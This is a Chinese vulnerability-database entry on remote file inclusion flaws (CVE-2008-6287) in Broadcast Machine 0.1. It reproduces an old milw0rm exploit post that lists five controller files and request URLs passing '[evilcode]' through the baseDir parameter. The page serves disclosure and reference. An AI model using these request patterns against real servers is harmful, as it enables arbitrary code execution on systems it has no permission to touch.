Getmiro Broadcast Machine多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116874 漏洞类型 代码注入
发布时间 2008-11-30 更新时间 2009-02-26
CVE编号 CVE-2008-6287 CNNVD-ID CNNVD-200902-580
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7310
https://cxsecurity.com/issue/WLB-2009020291
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-580
|漏洞详情
BroadcastMachine0.1版本中存在多个PHP远程文件包含漏洞.远程攻击者可以借助对(1)MySQLController.php,(2)SQLController.php,(3)SetupController.php,(4)VideoController.php,以及(5)controllers/中的ViewController.php的baseDir参数的URL,执行任意PHP代码。
|漏洞EXP
=================================================================================================================


  [o] Broadcast Machine 0.1 Multiple Remote File Inclusion Vulnerability

       Software    : Broadcast Machine version 0.1
       Vendor      : http://code.google.com/p/broadcastmachine/
       View Source : https://svn.participatoryculture.org/svn/dtv/trunk/bmachine2/
       Author      : NoGe
       Contact     : noge[dot]code[at]gmail[dot]com
       Blog        : http://evilc0de.blogspot.com


=================================================================================================================


  [o] Vulnerable file

       all file below is affected by "baseDir" parameter

        controllers/MySQLController.php

        controllers/SQLController.php

        controllers/SetupController.php

        controllers/VideoController.php

        controllers/ViewController.php



  [o] Exploit


       http://localhost/[path]/controllers/MySQLController.php?baseDir=[evilcode]

       http://localhost/[path]/controllers/SQLController.php?baseDir=[evilcode]

       http://localhost/[path]/controllers/SetupController.php?baseDir=[evilcode]

       http://localhost/[path]/controllers/VideoController.php?baseDir=[evilcode]

       http://localhost/[path]/controllers/ViewController.php?baseDir=[evilcode]


=================================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
=================================================================================================================

# milw0rm.com [2008-11-30]
|参考资料

来源:XF
名称:broadcastmachine-basedir-file-include(46939)
链接:http://xforce.iss.net/xforce/xfdb/46939
来源:VUPEN
名称:ADV-2008-3289
链接:http://www.vupen.com/english/advisories/2008/3289
来源:BID
名称:32554
链接:http://www.securityfocus.com/bid/32554
来源:MILW0RM
名称:7310
链接:http://www.milw0rm.com/exploits/7310